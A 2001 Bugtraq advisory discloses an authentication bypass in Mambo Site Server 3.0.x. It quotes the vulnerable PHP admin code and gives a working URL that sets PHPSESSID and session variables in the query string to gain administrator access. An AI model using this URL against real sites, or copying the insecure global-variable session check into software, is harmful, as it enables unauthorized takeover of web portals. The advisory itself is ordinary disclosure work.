[21839] in bugtraq
Serious security hole in Mambo Site Server version 3.0.X
daemon@ATHENA.MIT.EDU (root (Reverse))
Wed Jul 25 11:52:02 2001
Message-ID: <002101c114fe$d705e120$020000c0@komu>
From: "root (Reverse)" <root@reverseonline.com>
To: <bugtraq@securityfocus.com>
Date: Wed, 25 Jul 2001 13:42:09 +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="Windows-1252"
Content-Transfer-Encoding: 7bit
Serious security hole in Mambo Site Server version 3.0.X
Jul, 24 2001
by: Ismael Peinado Palomo - postmaster@reverseonline.com
www.reverseonline.com
Summary
Mambo Site Server is a dynamic portal engine and content management tool
based on PHP and MySQL.
Details
Vulnerable systems:
Mambo Site Server version 3.0.0 - 3.0.5
Immune systems:
Impact:
Any user can gain administrator privileges.
Exploits:
Under 'administrator/' dir. we found that index.php checks the user and
password:
if (isset($submit)){
$query = "SELECT id, password, name FROM users WHERE username='$myname'
AND (usertype='administrator' OR usertype='superadministrator')";
$result = $database->openConnectionWithReturn($query);
if (mysql_num_rows($result)!= 0){
list($userid, $dbpass, $fullname) = mysql_fetch_array($result);
.....
if (strcmp($dbpass,$pass)) {
//if the password entered does not match the database record ask user to
login again
print "<SCRIPT>alert('Incorrect Username and Password, please try
again'); document.location.href='index.php';</SCRIPT>\n";
}else {
//if the password matches the database
if ($remember!="on"){
//if the user does not want the password remembered and the cookie is
set, delete the cookie
if ($passwordcookie!=""){
setcookie("passwordcookie");
$passwordcookie="";
}
}
//set up the admin session then take the user into the admin section of
the site
session_register("myname");
session_register("fullname");
session_register("userid");
print "<SCRIPT>window.open('index2.php','newwindow');</SCRIPT>\n";
print "<SCRIPT>document.location.href='$live_site'</SCRIPT>\n";
}
}else {
print "<SCRIPT>alert('Incorrect Username and Password, please try
again'); document.location.href='index.php';</SCRIPT>\n";
}
as we can see if the password for administrator matches the one in the
database, some variables are registered in the session and we are redirected
to index2.php...so lets take a look at index2.php....
if (!$PHPSESSID){
print "<SCRIPT>document.location.href='index.php'</SCRIPT>\n";
exit(0);
}
else {
session_start();
if (!$myname) session_register("myname");
if (!$fullname) session_register("fullname");
if (!$uid) session_register("userid");
}
Here we can see the only verification of a valid user is through the global
var. PHPSESSID, so if we declare that variable on the url, and set the
'myname','fullname' and 'userid' we can gain administrative control...so
we'll test:
http://target.machine/administrator/index2.php?PHPSESSID=1&myname=admin&full
name=admin&userid=administrator
BINGO!! now we have full administrative privileges...that's a typical
example of PHP hacking...it's clear that security can't rely on global
variables since they may be modifyed through url parsing.
Ismael Peinado Palomo
Ingeniero Jefe I+D
postmaster@reverseonline.com
www.reverseonline.com
